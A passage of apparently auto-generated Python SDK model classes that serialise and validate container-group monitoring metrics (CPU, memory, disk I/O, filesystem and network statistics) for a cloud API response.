class DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetwork(TeaModel):
def __init__(self, interfaces=None):
self.interfaces = []
def validate(self):
self.validate_required(self.interfaces, 'interfaces')
if self.interfaces:
for k in self.interfaces:
if k :
k.validate()
def to_map(self):
result = {}
result['Interfaces'] = []
if self.interfaces is not None:
for k in self.interfaces:
result['Interfaces'].append(k.to_map() if k else None)
else:
result['Interfaces'] = None
return result
def from_map(self, map={}):
self.interfaces = []
if map.get('Interfaces') is not None:
for k in map.get('Interfaces'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetworkInterfaces()
temp_model = temp_model.from_map(k)
self.interfaces.append(temp_model)
else:
self.interfaces = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasRecords(TeaModel):
def __init__(self, timestamp=None, containers=None, _cpu=None, memory=None, network=None):
self.timestamp = timestamp
self.containers = []
self._cpu = _cpu
self.memory = memory
self.network = network
def validate(self):
self.validate_required(self.timestamp, 'timestamp')
self.validate_required(self.containers, 'containers')
if self.containers:
for k in self.containers:
if k :
k.validate()
self.validate_required(self._cpu, '_cpu')
if self._cpu:
self._cpu.validate()
self.validate_required(self.memory, 'memory')
if self.memory:
self.memory.validate()
self.validate_required(self.network, 'network')
if self.network:
self.network.validate()
def to_map(self):
result = {}
result['Timestamp'] = self.timestamp
result['Containers'] = []
if self.containers is not None:
for k in self.containers:
result['Containers'].append(k.to_map() if k else None)
else:
result['Containers'] = None
if self._cpu is not None:
result['CPU'] = self._cpu.to_map()
else:
result['CPU'] = None
if self.memory is not None:
result['Memory'] = self.memory.to_map()
else:
result['Memory'] = None
if self.network is not None:
result['Network'] = self.network.to_map()
else:
result['Network'] = None
return result
def from_map(self, map={}):
self.timestamp = map.get('Timestamp')
self.containers = []
if map.get('Containers') is not None:
for k in map.get('Containers'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsContainers()
temp_model = temp_model.from_map(k)
self.containers.append(temp_model)
else:
self.containers = None
if map.get('CPU') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsCPU()
self._cpu = temp_model.from_map(map['CPU'])
else:
self._cpu = None
if map.get('Memory') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsMemory()
self.memory = temp_model.from_map(map['Memory'])
else:
self.memory = None
if map.get('Network') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasRecordsNetwork()
self.network = temp_model.from_map(map['Network'])
else:
self.network = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsFsStats(TeaModel):
def __init__(self, device=None, type=None, limit=None, usage=None, base_usage=None, available=None, has_inodes=None, inodes=None, inodes_free=None, reads_completed=None, reads_merged=None, sectors_read=None, read_time=None, writes_completed=None, writes_merged=None, sectors_written=None, write_time=None, io_in_progress=None, io_time=None, weighted_io_time=None):
self.device = device
self.type = type
self.limit = limit
self.usage = usage
self.base_usage = base_usage
self.available = available
self.has_inodes = has_inodes
self.inodes = inodes
self.inodes_free = inodes_free
self.reads_completed = reads_completed
self.reads_merged = reads_merged
self.sectors_read = sectors_read
self.read_time = read_time
self.writes_completed = writes_completed
self.writes_merged = writes_merged
self.sectors_written = sectors_written
self.write_time = write_time
self.io_in_progress = io_in_progress
self.io_time = io_time
self.weighted_io_time = weighted_io_time
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.type, 'type')
self.validate_required(self.limit, 'limit')
self.validate_required(self.usage, 'usage')
self.validate_required(self.base_usage, 'base_usage')
self.validate_required(self.available, 'available')
self.validate_required(self.has_inodes, 'has_inodes')
self.validate_required(self.inodes, 'inodes')
self.validate_required(self.inodes_free, 'inodes_free')
self.validate_required(self.reads_completed, 'reads_completed')
self.validate_required(self.reads_merged, 'reads_merged')
self.validate_required(self.sectors_read, 'sectors_read')
self.validate_required(self.read_time, 'read_time')
self.validate_required(self.writes_completed, 'writes_completed')
self.validate_required(self.writes_merged, 'writes_merged')
self.validate_required(self.sectors_written, 'sectors_written')
self.validate_required(self.write_time, 'write_time')
self.validate_required(self.io_in_progress, 'io_in_progress')
self.validate_required(self.io_time, 'io_time')
self.validate_required(self.weighted_io_time, 'weighted_io_time')
def to_map(self):
result = {}
result['Device'] = self.device
result['Type'] = self.type
result['Limit'] = self.limit
result['Usage'] = self.usage
result['BaseUsage'] = self.base_usage
result['Available'] = self.available
result['HasInodes'] = self.has_inodes
result['Inodes'] = self.inodes
result['InodesFree'] = self.inodes_free
result['ReadsCompleted'] = self.reads_completed
result['ReadsMerged'] = self.reads_merged
result['SectorsRead'] = self.sectors_read
result['ReadTime'] = self.read_time
result['WritesCompleted'] = self.writes_completed
result['WritesMerged'] = self.writes_merged
result['SectorsWritten'] = self.sectors_written
result['WriteTime'] = self.write_time
result['IoInProgress'] = self.io_in_progress
result['IoTime'] = self.io_time
result['WeightedIoTime'] = self.weighted_io_time
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.type = map.get('Type')
self.limit = map.get('Limit')
self.usage = map.get('Usage')
self.base_usage = map.get('BaseUsage')
self.available = map.get('Available')
self.has_inodes = map.get('HasInodes')
self.inodes = map.get('Inodes')
self.inodes_free = map.get('InodesFree')
self.reads_completed = map.get('ReadsCompleted')
self.reads_merged = map.get('ReadsMerged')
self.sectors_read = map.get('SectorsRead')
self.read_time = map.get('ReadTime')
self.writes_completed = map.get('WritesCompleted')
self.writes_merged = map.get('WritesMerged')
self.sectors_written = map.get('SectorsWritten')
self.write_time = map.get('WriteTime')
self.io_in_progress = map.get('IoInProgress')
self.io_time = map.get('IoTime')
self.weighted_io_time = map.get('WeightedIoTime')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsAcceleratorStats(TeaModel):
def __init__(self, id=None, make=None, model=None, memory_total=None, memory_used=None, duty_cycle=None):
self.id = id
self.make = make
self.model = model
self.memory_total = memory_total
self.memory_used = memory_used
self.duty_cycle = duty_cycle
def validate(self):
self.validate_required(self.id, 'id')
self.validate_required(self.make, 'make')
self.validate_required(self.model, 'model')
self.validate_required(self.memory_total, 'memory_total')
self.validate_required(self.memory_used, 'memory_used')
self.validate_required(self.duty_cycle, 'duty_cycle')
def to_map(self):
result = {}
result['Id'] = self.id
result['Make'] = self.make
result['Model'] = self.model
result['MemoryTotal'] = self.memory_total
result['MemoryUsed'] = self.memory_used
result['DutyCycle'] = self.duty_cycle
return result
def from_map(self, map={}):
self.id = map.get('Id')
self.make = map.get('Make')
self.model = map.get('Model')
self.memory_total = map.get('MemoryTotal')
self.memory_used = map.get('MemoryUsed')
self.duty_cycle = map.get('DutyCycle')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuUsage(TeaModel):
def __init__(self, total=None, user=None, system=None, per_cpu_usages=None):
self.total = total
self.user = user
self.system = system
self.per_cpu_usages = []
def validate(self):
self.validate_required(self.total, 'total')
self.validate_required(self.user, 'user')
self.validate_required(self.system, 'system')
self.validate_required(self.per_cpu_usages, 'per_cpu_usages')
def to_map(self):
result = {}
result['Total'] = self.total
result['User'] = self.user
result['System'] = self.system
result['PerCpuUsages'] = []
if self.per_cpu_usages is not None:
for k in self.per_cpu_usages:
result['PerCpuUsages'].append(k)
else:
result['PerCpuUsages'] = None
return result
def from_map(self, map={}):
self.total = map.get('Total')
self.user = map.get('User')
self.system = map.get('System')
self.per_cpu_usages = []
if map.get('PerCpuUsages') is not None:
for k in map.get('PerCpuUsages'):
self.per_cpu_usages.append(k)
else:
self.per_cpu_usages = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuCFS(TeaModel):
def __init__(self, periods=None, throttled_periods=None, throttled_time=None):
self.periods = periods
self.throttled_periods = throttled_periods
self.throttled_time = throttled_time
def validate(self):
self.validate_required(self.periods, 'periods')
self.validate_required(self.throttled_periods, 'throttled_periods')
self.validate_required(self.throttled_time, 'throttled_time')
def to_map(self):
result = {}
result['Periods'] = self.periods
result['ThrottledPeriods'] = self.throttled_periods
result['ThrottledTime'] = self.throttled_time
return result
def from_map(self, map={}):
self.periods = map.get('Periods')
self.throttled_periods = map.get('ThrottledPeriods')
self.throttled_time = map.get('ThrottledTime')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStats(TeaModel):
def __init__(self, load_average=None, cpu_usage=None, cpu_cfs=None):
self.load_average = load_average
self.cpu_usage = cpu_usage
self.cpu_cfs = cpu_cfs
def validate(self):
self.validate_required(self.load_average, 'load_average')
self.validate_required(self.cpu_usage, 'cpu_usage')
if self.cpu_usage:
self.cpu_usage.validate()
self.validate_required(self.cpu_cfs, 'cpu_cfs')
if self.cpu_cfs:
self.cpu_cfs.validate()
def to_map(self):
result = {}
result['LoadAverage'] = self.load_average
if self.cpu_usage is not None:
result['CpuUsage'] = self.cpu_usage.to_map()
else:
result['CpuUsage'] = None
if self.cpu_cfs is not None:
result['CpuCFS'] = self.cpu_cfs.to_map()
else:
result['CpuCFS'] = None
return result
def from_map(self, map={}):
self.load_average = map.get('LoadAverage')
if map.get('CpuUsage') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuUsage()
self.cpu_usage = temp_model.from_map(map['CpuUsage'])
else:
self.cpu_usage = None
if map.get('CpuCFS') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsCpuStatsCpuCFS()
self.cpu_cfs = temp_model.from_map(map['CpuCFS'])
else:
self.cpu_cfs = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceBytes(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiced(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoQueued(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsSectors(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceTime(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoWaitTime(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoMerged(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoTime(TeaModel):
def __init__(self, device=None, major=None, minor=None, stats=None):
self.device = device
self.major = major
self.minor = minor
self.stats = stats
def validate(self):
self.validate_required(self.device, 'device')
self.validate_required(self.major, 'major')
self.validate_required(self.minor, 'minor')
self.validate_required(self.stats, 'stats')
def to_map(self):
result = {}
result['Device'] = self.device
result['Major'] = self.major
result['Minor'] = self.minor
result['Stats'] = self.stats
return result
def from_map(self, map={}):
self.device = map.get('Device')
self.major = map.get('Major')
self.minor = map.get('Minor')
self.stats = map.get('Stats')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStats(TeaModel):
def __init__(self, io_service_bytes=None, io_serviced=None, io_queued=None, sectors=None, io_service_time=None, io_wait_time=None, io_merged=None, io_time=None):
self.io_service_bytes = []
self.io_serviced = []
self.io_queued = []
self.sectors = []
self.io_service_time = []
self.io_wait_time = []
self.io_merged = []
self.io_time = []
def validate(self):
self.validate_required(self.io_service_bytes, 'io_service_bytes')
if self.io_service_bytes:
for k in self.io_service_bytes:
if k :
k.validate()
self.validate_required(self.io_serviced, 'io_serviced')
if self.io_serviced:
for k in self.io_serviced:
if k :
k.validate()
self.validate_required(self.io_queued, 'io_queued')
if self.io_queued:
for k in self.io_queued:
if k :
k.validate()
self.validate_required(self.sectors, 'sectors')
if self.sectors:
for k in self.sectors:
if k :
k.validate()
self.validate_required(self.io_service_time, 'io_service_time')
if self.io_service_time:
for k in self.io_service_time:
if k :
k.validate()
self.validate_required(self.io_wait_time, 'io_wait_time')
if self.io_wait_time:
for k in self.io_wait_time:
if k :
k.validate()
self.validate_required(self.io_merged, 'io_merged')
if self.io_merged:
for k in self.io_merged:
if k :
k.validate()
self.validate_required(self.io_time, 'io_time')
if self.io_time:
for k in self.io_time:
if k :
k.validate()
def to_map(self):
result = {}
result['IoServiceBytes'] = []
if self.io_service_bytes is not None:
for k in self.io_service_bytes:
result['IoServiceBytes'].append(k.to_map() if k else None)
else:
result['IoServiceBytes'] = None
result['IoServiced'] = []
if self.io_serviced is not None:
for k in self.io_serviced:
result['IoServiced'].append(k.to_map() if k else None)
else:
result['IoServiced'] = None
result['IoQueued'] = []
if self.io_queued is not None:
for k in self.io_queued:
result['IoQueued'].append(k.to_map() if k else None)
else:
result['IoQueued'] = None
result['Sectors'] = []
if self.sectors is not None:
for k in self.sectors:
result['Sectors'].append(k.to_map() if k else None)
else:
result['Sectors'] = None
result['IoServiceTime'] = []
if self.io_service_time is not None:
for k in self.io_service_time:
result['IoServiceTime'].append(k.to_map() if k else None)
else:
result['IoServiceTime'] = None
result['IoWaitTime'] = []
if self.io_wait_time is not None:
for k in self.io_wait_time:
result['IoWaitTime'].append(k.to_map() if k else None)
else:
result['IoWaitTime'] = None
result['IoMerged'] = []
if self.io_merged is not None:
for k in self.io_merged:
result['IoMerged'].append(k.to_map() if k else None)
else:
result['IoMerged'] = None
result['IoTime'] = []
if self.io_time is not None:
for k in self.io_time:
result['IoTime'].append(k.to_map() if k else None)
else:
result['IoTime'] = None
return result
def from_map(self, map={}):
self.io_service_bytes = []
if map.get('IoServiceBytes') is not None:
for k in map.get('IoServiceBytes'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceBytes()
temp_model = temp_model.from_map(k)
self.io_service_bytes.append(temp_model)
else:
self.io_service_bytes = None
self.io_serviced = []
if map.get('IoServiced') is not None:
for k in map.get('IoServiced'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiced()
temp_model = temp_model.from_map(k)
self.io_serviced.append(temp_model)
else:
self.io_serviced = None
self.io_queued = []
if map.get('IoQueued') is not None:
for k in map.get('IoQueued'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoQueued()
temp_model = temp_model.from_map(k)
self.io_queued.append(temp_model)
else:
self.io_queued = None
self.sectors = []
if map.get('Sectors') is not None:
for k in map.get('Sectors'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsSectors()
temp_model = temp_model.from_map(k)
self.sectors.append(temp_model)
else:
self.sectors = None
self.io_service_time = []
if map.get('IoServiceTime') is not None:
for k in map.get('IoServiceTime'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoServiceTime()
temp_model = temp_model.from_map(k)
self.io_service_time.append(temp_model)
else:
self.io_service_time = None
self.io_wait_time = []
if map.get('IoWaitTime') is not None:
for k in map.get('IoWaitTime'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoWaitTime()
temp_model = temp_model.from_map(k)
self.io_wait_time.append(temp_model)
else:
self.io_wait_time = None
self.io_merged = []
if map.get('IoMerged') is not None:
for k in map.get('IoMerged'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoMerged()
temp_model = temp_model.from_map(k)
self.io_merged.append(temp_model)
else:
self.io_merged = None
self.io_time = []
if map.get('IoTime') is not None:
for k in map.get('IoTime'):
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsDiskIoStatsIoTime()
temp_model = temp_model.from_map(k)
self.io_time.append(temp_model)
else:
self.io_time = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsContainerData(TeaModel):
def __init__(self, pg_fault=None, pgmaj_fault=None):
self.pg_fault = pg_fault
self.pgmaj_fault = pgmaj_fault
def validate(self):
self.validate_required(self.pg_fault, 'pg_fault')
self.validate_required(self.pgmaj_fault, 'pgmaj_fault')
def to_map(self):
result = {}
result['PgFault'] = self.pg_fault
result['PgmajFault'] = self.pgmaj_fault
return result
def from_map(self, map={}):
self.pg_fault = map.get('PgFault')
self.pgmaj_fault = map.get('PgmajFault')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsHierarchicalData(TeaModel):
def __init__(self, pg_fault=None, pgmaj_fault=None):
self.pg_fault = pg_fault
self.pgmaj_fault = pgmaj_fault
def validate(self):
self.validate_required(self.pg_fault, 'pg_fault')
self.validate_required(self.pgmaj_fault, 'pgmaj_fault')
def to_map(self):
result = {}
result['PgFault'] = self.pg_fault
result['PgmajFault'] = self.pgmaj_fault
return result
def from_map(self, map={}):
self.pg_fault = map.get('PgFault')
self.pgmaj_fault = map.get('PgmajFault')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStats(TeaModel):
def __init__(self, usage=None, max_usage=None, cache=None, rss=None, swap=None, working_set=None, fail_cnt=None, container_data=None, hierarchical_data=None):
self.usage = usage
self.max_usage = max_usage
self.cache = cache
self.rss = rss
self.swap = swap
self.working_set = working_set
self.fail_cnt = fail_cnt
self.container_data = container_data
self.hierarchical_data = hierarchical_data
def validate(self):
self.validate_required(self.usage, 'usage')
self.validate_required(self.max_usage, 'max_usage')
self.validate_required(self.cache, 'cache')
self.validate_required(self.rss, 'rss')
self.validate_required(self.swap, 'swap')
self.validate_required(self.working_set, 'working_set')
self.validate_required(self.fail_cnt, 'fail_cnt')
self.validate_required(self.container_data, 'container_data')
if self.container_data:
self.container_data.validate()
self.validate_required(self.hierarchical_data, 'hierarchical_data')
if self.hierarchical_data:
self.hierarchical_data.validate()
def to_map(self):
result = {}
result['Usage'] = self.usage
result['MaxUsage'] = self.max_usage
result['Cache'] = self.cache
result['Rss'] = self.rss
result['Swap'] = self.swap
result['WorkingSet'] = self.working_set
result['FailCnt'] = self.fail_cnt
if self.container_data is not None:
result['ContainerData'] = self.container_data.to_map()
else:
result['ContainerData'] = None
if self.hierarchical_data is not None:
result['HierarchicalData'] = self.hierarchical_data.to_map()
else:
result['HierarchicalData'] = None
return result
def from_map(self, map={}):
self.usage = map.get('Usage')
self.max_usage = map.get('MaxUsage')
self.cache = map.get('Cache')
self.rss = map.get('Rss')
self.swap = map.get('Swap')
self.working_set = map.get('WorkingSet')
self.fail_cnt = map.get('FailCnt')
if map.get('ContainerData') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsContainerData()
self.container_data = temp_model.from_map(map['ContainerData'])
else:
self.container_data = None
if map.get('HierarchicalData') is not None:
temp_model = DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsMemoryStatsHierarchicalData()
self.hierarchical_data = temp_model.from_map(map['HierarchicalData'])
else:
self.hierarchical_data = None
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsInterfaceStats(TeaModel):
def __init__(self, name=None, rx_bytes=None, rx_packets=None, rx_errors=None, rx_dropped=None, tx_bytes=None, tx_packets=None, tx_dropped=None, tx_errors=None):
self.name = name
self.rx_bytes = rx_bytes
self.rx_packets = rx_packets
self.rx_errors = rx_errors
self.rx_dropped = rx_dropped
self.tx_bytes = tx_bytes
self.tx_packets = tx_packets
self.tx_dropped = tx_dropped
self.tx_errors = tx_errors
def validate(self):
self.validate_required(self.name, 'name')
self.validate_required(self.rx_bytes, 'rx_bytes')
self.validate_required(self.rx_packets, 'rx_packets')
self.validate_required(self.rx_errors, 'rx_errors')
self.validate_required(self.rx_dropped, 'rx_dropped')
self.validate_required(self.tx_bytes, 'tx_bytes')
self.validate_required(self.tx_packets, 'tx_packets')
self.validate_required(self.tx_dropped, 'tx_dropped')
self.validate_required(self.tx_errors, 'tx_errors')
def to_map(self):
result = {}
result['Name'] = self.name
result['RxBytes'] = self.rx_bytes
result['RxPackets'] = self.rx_packets
result['RxErrors'] = self.rx_errors
result['RxDropped'] = self.rx_dropped
result['TxBytes'] = self.tx_bytes
result['TxPackets'] = self.tx_packets
result['TxDropped'] = self.tx_dropped
result['TxErrors'] = self.tx_errors
return result
def from_map(self, map={}):
self.name = map.get('Name')
self.rx_bytes = map.get('RxBytes')
self.rx_packets = map.get('RxPackets')
self.rx_errors = map.get('RxErrors')
self.rx_dropped = map.get('RxDropped')
self.tx_bytes = map.get('TxBytes')
self.tx_packets = map.get('TxPackets')
self.tx_dropped = map.get('TxDropped')
self.tx_errors = map.get('TxErrors')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp(TeaModel):
def __init__(self, established=None, syn_sent=None, syn_recv=None, fin_wait_1=None, fin_wait_2=None, time_wait=None, close=None, close_wait=None, last_ack=None, listen=None, closing=None):
self.established = established
self.syn_sent = syn_sent
self.syn_recv = syn_recv
self.fin_wait_1 = fin_wait_1
self.fin_wait_2 = fin_wait_2
self.time_wait = time_wait
self.close = close
self.close_wait = close_wait
self.last_ack = last_ack
self.listen = listen
self.closing = closing
def validate(self):
self.validate_required(self.established, 'established')
self.validate_required(self.syn_sent, 'syn_sent')
self.validate_required(self.syn_recv, 'syn_recv')
self.validate_required(self.fin_wait_1, 'fin_wait_1')
self.validate_required(self.fin_wait_2, 'fin_wait_2')
self.validate_required(self.time_wait, 'time_wait')
self.validate_required(self.close, 'close')
self.validate_required(self.close_wait, 'close_wait')
self.validate_required(self.last_ack, 'last_ack')
self.validate_required(self.listen, 'listen')
self.validate_required(self.closing, 'closing')
def to_map(self):
result = {}
result['Established'] = self.established
result['SynSent'] = self.syn_sent
result['SynRecv'] = self.syn_recv
result['FinWait1'] = self.fin_wait_1
result['FinWait2'] = self.fin_wait_2
result['TimeWait'] = self.time_wait
result['Close'] = self.close
result['CloseWait'] = self.close_wait
result['LastAck'] = self.last_ack
result['Listen'] = self.listen
result['Closing'] = self.closing
return result
def from_map(self, map={}):
self.established = map.get('Established')
self.syn_sent = map.get('SynSent')
self.syn_recv = map.get('SynRecv')
self.fin_wait_1 = map.get('FinWait1')
self.fin_wait_2 = map.get('FinWait2')
self.time_wait = map.get('TimeWait')
self.close = map.get('Close')
self.close_wait = map.get('CloseWait')
self.last_ack = map.get('LastAck')
self.listen = map.get('Listen')
self.closing = map.get('Closing')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsTcp6(TeaModel):
def __init__(self, established=None, syn_sent=None, syn_recv=None, fin_wait_1=None, fin_wait_2=None, time_wait=None, close=None, close_wait=None, last_ack=None, listen=None, closing=None):
self.established = established
self.syn_sent = syn_sent
self.syn_recv = syn_recv
self.fin_wait_1 = fin_wait_1
self.fin_wait_2 = fin_wait_2
self.time_wait = time_wait
self.close = close
self.close_wait = close_wait
self.last_ack = last_ack
self.listen = listen
self.closing = closing
def validate(self):
self.validate_required(self.established, 'established')
self.validate_required(self.syn_sent, 'syn_sent')
self.validate_required(self.syn_recv, 'syn_recv')
self.validate_required(self.fin_wait_1, 'fin_wait_1')
self.validate_required(self.fin_wait_2, 'fin_wait_2')
self.validate_required(self.time_wait, 'time_wait')
self.validate_required(self.close, 'close')
self.validate_required(self.close_wait, 'close_wait')
self.validate_required(self.last_ack, 'last_ack')
self.validate_required(self.listen, 'listen')
self.validate_required(self.closing, 'closing')
def to_map(self):
result = {}
result['Established'] = self.established
result['SynSent'] = self.syn_sent
result['SynRecv'] = self.syn_recv
result['FinWait1'] = self.fin_wait_1
result['FinWait2'] = self.fin_wait_2
result['TimeWait'] = self.time_wait
result['Close'] = self.close
result['CloseWait'] = self.close_wait
result['LastAck'] = self.last_ack
result['Listen'] = self.listen
result['Closing'] = self.closing
return result
def from_map(self, map={}):
self.established = map.get('Established')
self.syn_sent = map.get('SynSent')
self.syn_recv = map.get('SynRecv')
self.fin_wait_1 = map.get('FinWait1')
self.fin_wait_2 = map.get('FinWait2')
self.time_wait = map.get('TimeWait')
self.close = map.get('Close')
self.close_wait = map.get('CloseWait')
self.last_ack = map.get('LastAck')
self.listen = map.get('Listen')
self.closing = map.get('Closing')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp(TeaModel):
def __init__(self, listen=None, dropped=None, rx_queued=None, tx_queued=None):
self.listen = listen
self.dropped = dropped
self.rx_queued = rx_queued
self.tx_queued = tx_queued
def validate(self):
self.validate_required(self.listen, 'listen')
self.validate_required(self.dropped, 'dropped')
self.validate_required(self.rx_queued, 'rx_queued')
self.validate_required(self.tx_queued, 'tx_queued')
def to_map(self):
result = {}
result['Listen'] = self.listen
result['Dropped'] = self.dropped
result['RxQueued'] = self.rx_queued
result['TxQueued'] = self.tx_queued
return result
def from_map(self, map={}):
self.listen = map.get('Listen')
self.dropped = map.get('Dropped')
self.rx_queued = map.get('RxQueued')
self.tx_queued = map.get('TxQueued')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStatsUdp6(TeaModel):
def __init__(self, listen=None, dropped=None, rx_queued=None, tx_queued=None):
self.listen = listen
self.dropped = dropped
self.rx_queued = rx_queued
self.tx_queued = tx_queued
def validate(self):
self.validate_required(self.listen, 'listen')
self.validate_required(self.dropped, 'dropped')
self.validate_required(self.rx_queued, 'rx_queued')
self.validate_required(self.tx_queued, 'tx_queued')
def to_map(self):
result = {}
result['Listen'] = self.listen
result['Dropped'] = self.dropped
result['RxQueued'] = self.rx_queued
result['TxQueued'] = self.tx_queued
return result
def from_map(self, map={}):
self.listen = map.get('Listen')
self.dropped = map.get('Dropped')
self.rx_queued = map.get('RxQueued')
self.tx_queued = map.get('TxQueued')
return self
class DescribeMultiContainerGroupMetricResponseMonitorDatasContainerInfosContainerStatsNetworkStats(TeaModel):
